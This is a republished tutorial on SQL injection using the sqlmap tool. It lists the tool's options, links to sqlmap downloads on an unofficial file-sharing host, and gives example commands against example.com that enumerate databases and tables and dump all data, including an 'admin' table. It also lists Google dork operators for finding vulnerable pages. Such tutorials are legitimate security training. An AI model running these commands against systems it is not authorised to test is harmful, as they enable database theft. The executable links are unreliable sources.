Mastering SQL Injection with Sqlmap: A Hands‑On Exploitation Guide
This article introduces the fundamentals of SQL injection, explains Sqlmap's five injection techniques, lists supported databases, shows installation methods, walks through essential commands and options, and provides practical examples for testing and exploiting vulnerable web applications.
Preface
Hello, I am Huang Wei. Many people have heard of SQL injection but do not fully understand it. This article explains what SQL injection is and how it works.
1. Overview of SQL Injection
SQL injection involves inserting malicious SQL commands into web forms or URL query strings to manipulate the backend database. Common approaches include guessing table names and bypassing filters using logical operators such as AND or OR.
2. Sqlmap Injection Methods
Sqlmap supports five injection modes:
Time‑based blind injection
Boolean‑based blind injection
Error‑based injection
Union‑based injection
Stacked query injection
3. Databases Supported by Sqlmap
Sqlmap works with most mainstream databases, including MySQL, MongoDB, Oracle, SQL Server, Access, SQLite, and others.
4. Installing Sqlmap
You can either install the Python version of Sqlmap or download a pre‑compiled binary. Below are the download links:
Sqlmap.py :https://u062.com/file/7715018-453776489
Sqlmap.exe: https://u062.com/file/7715018-4537768925. Basic Commands
Running sqlmap -h displays all available commands. The -hh option provides a more detailed help list. Screenshots illustrate the help output.
6. Options Overview
Key option groups are listed below (excerpt):
Options:
--version Show version and exit
-h, --help Show help and exit
-v VERBOSE Verbosity level 0‑6 (default 1)
Target:
-u URL, --url=URL Target URL
-d DIRECT Direct DB connection
-l LIST Parse URLs from Burp/WebScarab logs
-m BULKFILE Scan multiple targets from file
-r REQUESTFILE Load HTTP request from file
-g GOOGLEDORK Use Google dork results as targets
-c CONFIGFILE Load options from INI file
Request:
--data=DATA POST data string
--cookie=COOKIE HTTP Cookie header
--user-agent=AGENT Specify User‑Agent header
--random-agent Use random User‑Agent
--proxy=PROXY Use HTTP proxy
--delay=DELAY Delay between requests (seconds)
--timeout=TIMEOUT Connection timeout (default 30s)
Optimization:
-o Enable all optimizations
--predict-output Predict common query output
--keep-alive Use persistent HTTP(S) connections
--threads=THREADS Max concurrent requests (default 1)
Injection:
-p TESTPARAMETER Test specific parameter
--dbms=DBMS Force backend DBMS type
--os=OS Force backend OS type
--technique=TECH SQL injection techniques (default BEUST)
Detection:
--level=LEVEL Test level 1‑5 (default 1)
--risk=RISK Risk level 0‑3 (default 1)
--string=STRING True when string matches
--not-string=... False when string matches
--regexp=REGEXP Regex match on response
Enumeration:
-b, --banner Retrieve DBMS banner
--current-user Current DBMS user
--current-db Current database
--users Enumerate DBMS users
--passwords Enumerate password hashes
--privileges Enumerate user privileges
--dbs Enumerate databases
--tables Enumerate tables
--columns Enumerate columns
--dump Dump table data
Miscellaneous:
--batch Never ask for user input
--tor Use Tor network
--wizard Simple wizard for beginners7. Practical Examples
1. Checking a URL for injection:
sqlmap -u http://www.example.com/forum.php?id=1 -dbms mysql -v 3 --dbs2. Building a POST request:
sqlmap -u http://www.example.com/login.php --data="user=admin&pass=123" -dbms mysql -v 33. Retrieving database and table information:
sqlmap -u http://www.example.com/forum.php?id=1 -dbms mysql -v 3 --tables -D VIP
sqlmap -u http://www.example.com/forum.php?id=1 -dbms mysql -v 3 --columns -T admin -D VIP4. Dumping all data from a database:
sqlmap -u http://www.example.com/forum.php?id=1 -D "VIP" --dump-all5. Brute‑forcing usernames and passwords using a test web server (illustrated with screenshots).
8. Google Dork Syntax
Common Google dork operators such as intitle:, inurl:, intext:, filetype:, site:, and others can be used to discover vulnerable pages and hidden resources.
intitle: Search page titles for keywords
inurl: Search URLs for keywords
intext: Search page content for keywords
filetype: Search for specific file extensions
site: Restrict search to a specific domain
link: Find pages linking to a URL
"" Exact phrase match
+ Must include term
- Exclude term
* Wildcard
| OR operatorConclusion
SQL injection is a powerful technique that can be discovered relatively easily, while defending against it is straightforward. This guide provides a concise overview to help readers understand the basics, improve their testing skills, and raise awareness of web security.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Python Crawling & Data Mining
Life's short, I code in Python. This channel shares Python web crawling, data mining, analysis, processing, visualization, automated testing, DevOps, big data, AI, cloud computing, machine learning tools, resources, news, technical articles, tutorial videos and learning materials. Join us!
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.